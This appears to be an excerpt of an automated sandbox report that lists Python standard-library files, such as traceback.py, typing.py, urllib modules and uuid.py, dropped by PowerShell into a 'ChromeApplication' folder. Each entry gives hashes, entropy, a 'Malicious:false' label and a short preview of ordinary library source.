                                                                                                                                                                                                  SHA1:426A82CFAD92FF74C773A402A04E5F2E62E7DFAA
                                                                                                                                                                                                  SHA-256:2358675675BEB7A085FB97A7470B7E96327DFA8DE25BA49C5E5B4153197A4086
                                                                                                                                                                                                  SHA-512:5B81E97E8EC85A59C1F95148030DD1754C8E6D80FE794D895A05F47CA63961E49FA7074DCA85EBE79FE813467676C58DC7D428FFF19DF8ECE321ACC9E9CE28DE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Tokenization help for Python programs.....tokenize(readline) is a generator that breaks a stream of bytes into..Python tokens. It decodes the bytes according to PEP-0263 for..determining source file encoding.....It accepts a readline-like method which is called repeatedly to get the..next line of input (or b"" for EOF). It generates 5-tuples with these..members:.... the token type (see token.py).. the token (a string).. the starting (row, column) indices of the token (a 2-tuple of ints).. the ending (row, column) indices of the token (a 2-tuple of ints).. the original line (string)....It is designed to match the working of the Python tokenizer exactly, except..that it produces COMMENT tokens for comments and gives type OP for all..operators. Additionally, all token lists start with an ENCODING token..which tells you which encoding was used to decode the bytes stream..."""....__author__ = 'Ka-Ping Yee <ping@lfw.org>'..__credits__ = ('GvR, ESR, Tim Peters, Thomas Wou

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\trace.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29943
                                                                                                                                                                                                  Entropy (8bit):4.347507846378227
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:s8ANL0a9ZzFP5mpE+y0161HRlT9Lx+Mdbud3:biL0aJYp5yVtfud3
                                                                                                                                                                                                  MD5:44BAC37B405DD10CBEFE06F87249CDEF
                                                                                                                                                                                                  SHA1:3F1F7575D8FEE518D2E1D898CE1B557FEFD89A84
                                                                                                                                                                                                  SHA-256:7D0148C232A2116E1F47346532B62CAAB39D26743299E734362551520828C713
                                                                                                                                                                                                  SHA-512:2DDAEA9CC43D90404031A2E395320F5830717BD8CC9064948AD5039EF09DE640CA49F0601821A6EAC8EE3E7DF8C9C93B32C30FFAB48B89A7BF9EBE1BA963BA7E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#!/usr/bin/env python3....# portions copyright 2001, Autonomous Zones Industries, Inc., all rights.....# err... reserved and offered to the public under the terms of the..# Python 2.2 license...# Author: Zooko O'Whielacronx..# http://zooko.com/..# mailto:zooko@zooko.com..#..# Copyright 2000, Mojam Media, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1999, Bioreason, Inc., all rights reserved...# Author: Andrew Dalke..#..# Copyright 1995-1997, Automatrix, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1991-1995, Stichting Mathematisch Centrum, all rights reserved...#..#..# Permission to use, copy, modify, and distribute this Python software and..# its associated documentation for any purpose without fee is hereby..# granted, provided that the above copyright notice appears in all copies,..# and that both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of neither Automatrix,..# Bioreas

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\traceback.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26910
                                                                                                                                                                                                  Entropy (8bit):4.415954176266664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yMn4PJRbCzdIxe/djOOkCnLIr4RCI+jpJAhqxSpGNYCkcAaZMGJP:yM4htOIxeb+f5PYX5aaGJP
                                                                                                                                                                                                  MD5:9FF63955DDAAD02512C46D4042FF21D5
                                                                                                                                                                                                  SHA1:9FD62E2D0BC3AB552157F6A844870D1C4D092A95
                                                                                                                                                                                                  SHA-256:3725667A85A861E1EE626774F9AE11F3EF7DAB2210222EB1742546F8057CA7B5
                                                                                                                                                                                                  SHA-512:79F56EE47A36CF81A4361927B17BA7F69507961ECF196419C0AFD06516F53C2891C30A469100233E410BEFC6244831FD21F6866BE9F61BF80BD402DBF100BE9D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Extract, format and print information about Python stack traces."""....import collections..import itertools..import linecache..import sys....__all__ = ['extract_stack', 'extract_tb', 'format_exception',.. 'format_exception_only', 'format_list', 'format_stack',.. 'format_tb', 'print_exc', 'format_exc', 'print_exception',.. 'print_last', 'print_stack', 'print_tb', 'clear_frames',.. 'FrameSummary', 'StackSummary', 'TracebackException',.. 'walk_stack', 'walk_tb']....#..# Formatting and printing lists of traceback lines...#....def print_list(extracted_list, file=None):.. """Print the list of tuples as returned by extract_tb() or.. extract_stack() as a formatted stack trace to the given file.""".. if file is None:.. file = sys.stderr.. for item in StackSummary.from_list(extracted_list).format():.. print(item, file=file, end="")....def format_list(extracted_list):.. """Format a list of tuples or FrameSummary obj

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tracemalloc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18607
                                                                                                                                                                                                  Entropy (8bit):4.3022125555964355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+4LhpNVbPdoUFsyIygyWy98JYYV/lGT7mEE/U/JZJtvryt/+ZYJOZGB5qTW:VhbVbPbFhFdWy98JYYVNGXLjGT
                                                                                                                                                                                                  MD5:0233BC515180C861D919BA79B6928163
                                                                                                                                                                                                  SHA1:FD671280B0ECDD6E8EB44F36C75ADE6E5C32DE8F
                                                                                                                                                                                                  SHA-256:488C28AD5FD084DD715986EA235928894F1B140AC880A5872655A99C97054DC2
                                                                                                                                                                                                  SHA-512:6B158318BF6BBCE099EC3519E5A2780504ADBB93B76F33FA19DE57BCA808757A466731D2D7C47EBCA29B492AE66685908449B811A02DA1BD62FE1F6D95B0A7A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from collections.abc import Sequence, Iterable..from functools import total_ordering..import fnmatch..import linecache..import os.path..import pickle....# Import types and functions implemented in C..from _tracemalloc import *..from _tracemalloc import _get_object_traceback, _get_traces......def _format_size(size, sign):.. for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB'):.. if abs(size) < 100 and unit != 'B':.. # 3 digits (xx.x UNIT).. if sign:.. return "%+.1f %s" % (size, unit).. else:.. return "%.1f %s" % (size, unit).. if abs(size) < 10 * 1024 or unit == 'TiB':.. # 4 or 5 digits (xxxx UNIT).. if sign:.. return "%+.0f %s" % (size, unit).. else:.. return "%.0f %s" % (size, unit).. size /= 1024......class Statistic:.. """.. Statistic difference on memory allocations between two Snapshot instance... """.... __slots__ = ('traceback

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tty.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):915
                                                                                                                                                                                                  Entropy (8bit):5.155261600153728
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:NTExRunRoMsDJ3DTFBNUtzlZhFR7nrCVRTLSgDmOSad5hsh3G9FX9bI0ARdCVRTt:NT0SWBgTFRXC7TBLSavr/9UpC7TVlI9u
                                                                                                                                                                                                  MD5:766278735444B810C8C42470582F1A83
                                                                                                                                                                                                  SHA1:0137F3643374A75BC4F60CE34668BEA5C299C921
                                                                                                                                                                                                  SHA-256:45805F726BF977290DFAC21AEAC1E506E7759804BF9D01DB5DCF7D17337AEA30
                                                                                                                                                                                                  SHA-512:FD1EE04ED1AED4097E96A15A902398790447DB311577E8B8ECA86752D353A2699D6C9101C4D5DDF846DBFC3144B8B51CAC0016C1C84827AE7A0B30E9E88F7AC4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Terminal utilities."""....# Author: Steen Lumholt.....from termios import *....__all__ = ["setraw", "setcbreak"]....# Indexes for termios list...IFLAG = 0..OFLAG = 1..CFLAG = 2..LFLAG = 3..ISPEED = 4..OSPEED = 5..CC = 6....def setraw(fd, when=TCSAFLUSH):.. """Put terminal into a raw mode.""".. mode = tcgetattr(fd).. mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON).. mode[OFLAG] = mode[OFLAG] & ~(OPOST).. mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB).. mode[CFLAG] = mode[CFLAG] | CS8.. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN | ISIG).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)....def setcbreak(fd, when=TCSAFLUSH):.. """Put terminal into a cbreak mode.""".. mode = tcgetattr(fd).. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\turtle.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):147901
                                                                                                                                                                                                  Entropy (8bit):4.482922205570421
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:RhZ5qJ9LvUDb+m2lrOprf5Aibivx4fi1lSCOVXc7:gFsb92lrOprf5ax4fi1lNOVXc7
                                                                                                                                                                                                  MD5:87A161538841B0A199EE354BAAFE9EDA
                                                                                                                                                                                                  SHA1:D6F87E3743EB1A92F75F7DB91D5ED609F721E1A2
                                                                                                                                                                                                  SHA-256:9D4D85BD394123349A6F73326C9236D45E84F0920C2695FEB9B1CD18C6BF2681
                                                                                                                                                                                                  SHA-512:34D3314445EA94C30A19B8080C79034A7A434A0293317B44D9F128A45ADC107BCA8736121A72FFE7B04EDFE38BAEE876E6FB2D0375A095D48A79EF698939CB4F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# turtle.py: a Tkinter based turtle graphics module for Python..# Version 1.1b - 4. 5. 2009..#..# Copyright (C) 2006 - 2010 Gregor Lingl..# email: glingl@aon.at..#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\types.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10424
                                                                                                                                                                                                  Entropy (8bit):4.624334482565398
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:RYevVry18c+zNVWPfeSE5b6r/OKi+VfTQJWDswfAE9UYzaSaVDYG1XVz6:RYu+189zHWPm9l4faWYwLaVDZ1XV+
                                                                                                                                                                                                  MD5:C58C7A4EE7E383BE91CD75264D67B13B
                                                                                                                                                                                                  SHA1:60914B6F1022249CD5D0CF8CAA7ADB4DCF34C9EA
                                                                                                                                                                                                  SHA-256:0D3A1A2F8F0E286AD9EADBB397AF0C2DC4BEF0C71A7EBE4B51DED9862A301B01
                                                                                                                                                                                                  SHA-512:9450E434C0D4ABB93FA4CA2049626C05F65D4FB796D17AC5E504B8EC086ABEC00DCDC54319C1097D20E6E1EEC82529993482E37A0BF9675328421F1FA073BF04
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Define names for built-in types that aren't directly accessible as a builtin..."""..import sys....# Iterators in Python aren't a matter of type but of protocol. A large..# and changing number of builtin types implement *some* flavor of..# iterator. Don't check the type! Use hasattr to check for both..# "__iter__" and "__next__" attributes instead.....def _f(): pass..FunctionType = type(_f)..LambdaType = type(lambda: None) # Same as FunctionType..CodeType = type(_f.__code__)..MappingProxyType = type(type.__dict__)..SimpleNamespace = type(sys.implementation)....def _cell_factory():.. a = 1.. def f():.. nonlocal a.. return f.__closure__[0]..CellType = type(_cell_factory())....def _g():.. yield 1..GeneratorType = type(_g())....async def _c(): pass.._c = _c()..CoroutineType = type(_c).._c.close() # Prevent ResourceWarning....async def _ag():.. yield.._ag = _ag()..AsyncGeneratorType = type(_ag)....class _C:.. def _m(self): pass..MethodType = type(_C(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\typing.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):95233
                                                                                                                                                                                                  Entropy (8bit):4.620896311323428
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:sChrnYjztAmhmKGKx/cHLfxRs/XbuRbSzN3LKn0EOdITayuk8wr6/XIN+N3:sChrnYtjmKa5KXbuRgN32n2d0aTwru4e
                                                                                                                                                                                                  MD5:82326ED4E7F4E1BEA3CF43DBBD7A1BC5
                                                                                                                                                                                                  SHA1:A87A102CD28E9CC4749DFCC320434866D7B23315
                                                                                                                                                                                                  SHA-256:6297F3CDEE258CF737E0167974DB2912F5933F59F8E7FD1EE33FD2F7A959351D
                                                                                                                                                                                                  SHA-512:C2A68B6F90321725442A69C75297E62C08F38BB9DA6A3EB1DC43CF0817633CED9CD70421FCD375A39D69FC0E4D8CE7E69D88835C8C75B8B0337CE8B30AA1713C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..The typing module: Support for gradual typing as defined by PEP 484.....At large scale, the structure of the module is following:..* Imports and exports, all public names should be explicitly added to __all__...* Internal helper functions: these should never be used in code outside this module...* _SpecialForm and its instances (special forms):.. Any, NoReturn, ClassVar, Union, Optional, Concatenate..* Classes whose instances can be type arguments in addition to types:.. ForwardRef, TypeVar and ParamSpec..* The core of internal generics API: _GenericAlias and _VariadicGenericAlias, the latter is.. currently only used by Tuple and Callable. All subscripted types like X[int], Union[int, str],.. etc., are instances of either of these classes...* The public counterpart of the generics API consists of two classes: Generic and Protocol...* Public helper functions: get_type_hints, overload, cast, no_type_check,.. no_type_check_decorator...* Generic aliases for collections.abc ABCs a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\urllib\error.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2489
                                                                                                                                                                                                  Entropy (8bit):4.639470944288693
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:vxZuQSkq8fQydcJR+j/TQ8/qcISXaf7CXy2ravbTl5AJ:vx0QSkq8Yyj/TQ/cISKjSobAJ
                                                                                                                                                                                                  MD5:03686114721E9382F02E9F7BA58C6D75
                                                                                                                                                                                                  SHA1:010D984B477B36EE38BC6F0A3C769D1DE4C8B38A
                                                                                                                                                                                                  SHA-256:17E896A26FF42405F58189DE81A531B17630398CFBC7C9E2B72ED1AC472ACF01
                                                                                                                                                                                                  SHA-512:0CB25AB2DBAD2811AEBF5186FD5D5996BC66AE113D2F19EE56F397840E9F630D224829969774D91E00168105B6DB800B707C15A2CB898FA75BA91348B9D3922F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Exception classes raised by urllib.....The base exception class is URLError, which inherits from OSError. It..doesn't define any behavior of its own, but is the base class for all..exceptions defined in this package.....HTTPError is an exception class that is also a valid HTTP response..instance. It behaves this way because HTTP protocol errors are valid..responses, with a status code, headers, and a body. In some contexts,..an application may want to handle an exception like a regular..response..."""..import io..import urllib.response....__all__ = ['URLError', 'HTTPError', 'ContentTooShortError']......class URLError(OSError):.. # URLError is a sub-type of OSError, but it doesn't share any of.. # the implementation. need to override __init__ and __str__... # It sets self.args for compatibility with other OSError.. # subclasses, but args doesn't have the typical format with errno in.. # slot 0 and strerror in slot 1. This may be better than nothing... def __ini

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\urllib\parse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43463
                                                                                                                                                                                                  Entropy (8bit):4.67743372821875
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:z15Re+AP2AZ6pDPMSejN/3vzXZmErW63SMZ/dqH9qLc48nGLDwzKiu4U5FRyFxXf:z1u+bRoRlpZY0LoKD95FkFxP
                                                                                                                                                                                                  MD5:93EED57FB7B8E0BA840402C2189F2501
                                                                                                                                                                                                  SHA1:7BAEE34ECCF9EB12A2ED4E18033A395E4B19253A
                                                                                                                                                                                                  SHA-256:A70A09CD0CF91D735AE6B121D0F790FC9A8F497918794A72485F1DEAB360DBC2
                                                                                                                                                                                                  SHA-512:5904086E7C9A325083554FD862ED7868C147C33B137AA38DA3F4C9E3E2FB1E15001307130364000AF71BF6ACA89B92B1BEBA828B6AE721F1CC2CF20DC519569D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Parse (absolute and relative) URLs.....urlparse module is based upon the following RFC specifications.....RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding..and L. Masinter, January 2005.....RFC 2732 : "Format for Literal IPv6 Addresses in URL's by R.Hinden, B.Carpenter..and L.Masinter, December 1999.....RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T...Berners-Lee, R. Fielding, and L. Masinter, August 1998.....RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zawinski, July 1998.....RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June..1995.....RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M...McCahill, December 1994....RFC 3986 is considered the current standard and any future changes to..urlparse module should conform with it. The urlparse module is..currently not entirely compliant with this RFC due to defacto..scenarios for parsing, and for backward compa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\urllib\request.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):104880
                                                                                                                                                                                                  Entropy (8bit):4.4616704457405785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:hhI8oMeTXIt9w6jWbSdYOt/su7pxtzQhjortW7OyjarA05XfJtwTJTL6KvS4DGlm:4MeTX49w6jWbSd/t/su7pxtzQh0rtW7n
                                                                                                                                                                                                  MD5:AFE01E917CE572825DA95E2F73C3A182
                                                                                                                                                                                                  SHA1:B594E4DF01E500977FCE80A72D5D394EB88936F2
                                                                                                                                                                                                  SHA-256:A07AF23F83F01C5567676BDE1E4CD9FA58161B1D2BBCE00DB630AE881A011416
                                                                                                                                                                                                  SHA-512:E54F110C9232B72EE23C7B3B35D8FB09B6223372EEF98F7B82092F8912379734F45CCC01DDE6822D2C302E9EAC7E36B0A15A65BA62B1674262184C462EF414F6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""An extensible library for opening URLs using a variety of protocols....The simplest way to use this module is to call the urlopen function,..which accepts a string containing a URL or a Request object (described..below). It opens the URL and returns the results as file-like..object; the returned object has some extra methods described below.....The OpenerDirector manages a collection of Handler objects that do..all the actual work. Each Handler implements a particular protocol or..option. The OpenerDirector is a composite object that invokes the..Handlers needed to open the requested URL. For example, the..HTTPHandler performs HTTP GET and POST requests and deals with..non-error returns. The HTTPRedirectHandler automatically deals with..HTTP 301, 302, 303 and 307 redirect errors, and the HTTPDigestAuthHandler..deals with digest authentication.....urlopen(url, data=None) -- Basic usage is the same as original..urllib. pass the url and optionally data to post to an HTTP URL, and

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\urllib\response.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2445
                                                                                                                                                                                                  Entropy (8bit):4.431974454129167
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:r4BbvTGvQS07lPgWWdq9tsrdyW19ej5wkwBkvR:MBzaQS07lY5cjtWywkwBkZ
                                                                                                                                                                                                  MD5:D531F0A30312F650F962EAA31652AEBB
                                                                                                                                                                                                  SHA1:A565B2AB6F6A05F0681B62B5E2E77B9BC25D3683
                                                                                                                                                                                                  SHA-256:3B79834FB777BCC3601B05C8A2BBFAB1A72BF99B10E5A5D2C20A7C3A4583D0CF
                                                                                                                                                                                                  SHA-512:25BBA9683CC29296DD103473FBDC24CF7037FCC9736494DA749B3BB9A4189B108B2CDC586AEB923BF2B48D147FFBB306D073F2A1BB1430599B8AE74F6CB629E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Response classes used by urllib.....The base class, addbase, defines a minimal file-like interface,..including read() and readline(). The typical response object is an..addinfourl instance, which defines an info() method that returns..headers and a geturl() method that returns the url..."""....import tempfile....__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']......class addbase(tempfile._TemporaryFileWrapper):.. """Base class for addinfo and addclosehook. Is a good idea for garbage collection.""".... # XXX Add a method to expose the timeout on the underlying socket?.... def __init__(self, fp):.. super(addbase, self).__init__(fp, '<urllib response>', delete=False).. # Keep reference around as this was part of the original API... self.fp = fp.... def __repr__(self):.. return '<%s at %r whose fp = %r>' % (self.__class__.__name__,.. id(self), self.file).... def __enter__(self):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\urllib\robotparser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9697
                                                                                                                                                                                                  Entropy (8bit):4.15994740890475
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LEvpw5Ct9tcVd/2/paTJqSXkkOFGAiRiH57f/ivoiqN9/qVRjmGSEBaL/KK8Wh/R:46Ct9tcVFTJqF7fOQoVVB0GK8WP3
                                                                                                                                                                                                  MD5:A024DF2786691CF05997954F37178BE0
                                                                                                                                                                                                  SHA1:617ACE96E03067AD58490972A1E2122885C19813
                                                                                                                                                                                                  SHA-256:05CED87A4F681014F6A5BF7370680CDCE02B392A559832CB6D2AA2F910F7D5EB
                                                                                                                                                                                                  SHA-512:FA3406801D1D39B9BFCF052A473F297E2782F19F18A5C24139E94088F5AAABC15D1EFE7269E4E7426E13DD4DA0BC92F0A9C661B3325CEE171E3C910EA6820793
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" robotparser.py.... Copyright (C) 2000 Bastian Kleineidam.... You can choose between two licenses when using this package:.. 1) GNU GPLv2.. 2) PSF license for Python 2.2.... The robots.txt Exclusion Protocol is implemented as specified in.. http://www.robotstxt.org/norobots-rfc.txt.."""....import collections..import urllib.parse..import urllib.request....__all__ = ["RobotFileParser"]....RequestRate = collections.namedtuple("RequestRate", "requests seconds")......class RobotFileParser:.. """ This class provides a set of methods to read, parse and answer.. questions about a single robots.txt file..... """.... def __init__(self, url=''):.. self.entries = [].. self.sitemaps = [].. self.default_entry = None.. self.disallow_all = False.. self.allow_all = False.. self.set_url(url).. self.last_checked = 0.... def mtime(self):.. """Returns the time the robots.txt file was last fetched..... This i

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\uu.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7165
                                                                                                                                                                                                  Entropy (8bit):4.635646219278868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqFD4C1j1e5e65PARhQ3E2Q/N56npYv9EVBDgcDrkONFhnlO7c0pz:1zj1Qe8PARQEH/6nSVEVve7c0pz
                                                                                                                                                                                                  MD5:CDE9C803E2AC98627170F6CDD8030520
                                                                                                                                                                                                  SHA1:5AF6EC7A8B5D787F56FCE7B01F9D103B5D22C3A5
                                                                                                                                                                                                  SHA-256:35CD5F9AB4611102799F21E7EFFA5F31EFEE56826E0383F59BAFD27BB3598B9A
                                                                                                                                                                                                  SHA-512:942A451A97BD6099C2608685E2097588527627FB1825127E622BA8359E1C104205F89036118241DFB44309077DFE818D703F91116D537A235AFD0B04F3C92D0F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3....# Copyright 1994 by Lance Ellinghouse..# Cathedral City, California Republic, United States of America...# All Rights Reserved..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Lance Ellinghouse..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# LANCE ELLINGHOUSE DISCLAIMS ALL WARRANTIES WITH REGARD TO..# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND..# FITNESS, IN NO EVENT SHALL LANCE ELLINGHOUSE CENTRUM BE LIABLE..# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\uuid.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28233
                                                                                                                                                                                                  Entropy (8bit):4.867217589417424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hq/jU0Qc7Ad2XLCqXcppi4D9rGcMyiNB/2TFbVjjh5:hq/I0QcUcX+qXcppi7Ijh5
                                                                                                                                                                                                  MD5:ECA958D6B61E6FA8319F071C7D3CA253
                                                                                                                                                                                                  SHA1:657398649832132808FD5DDB3B05240525758535
                                                                                                                                                                                                  SHA-256:AC5DD1BFF2AC117CF1D1A9F86131D2E93C935CA59CF0A89D6ABB05295EDF007B
                                                                                                                                                                                                  SHA-512:D856FBADF451F3C6126F6EC65CFBD31A240496EFA88E77FCEB4298618F8192A07523C9360225C48404EDF12E6E71EA0C54B96AB7A9844AB51AB3C23D35D74B73
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""UUID objects (universally unique identifiers) according to RFC 4122.....This module provides immutable UUID objects (class UUID) and the functions..uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5..UUIDs as specified in RFC 4122.....If all you want is a unique ID, you should probably call uuid1() or uuid4()...Note that uuid1() may compromise privacy since it creates a UUID containing..the computer's network address. uuid4() creates a random UUID.....Typical usage:.... >>> import uuid.... # make a UUID based on the host ID and current time.. >>> uuid.uuid1() # doctest: +SKIP.. UUID('a8098c1a-f86e-11da-bd1a-00112444be1e').... # make a UUID using an MD5 hash of a namespace UUID and a name.. >>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org').. UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e').... # make a random UUID.. >>> uuid.uuid4() # doctest: +SKIP.. UUID('16fd2706-8baf-433b-82eb-8c7fada847da').... # make a UUID using a SHA-1

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\warnings.py

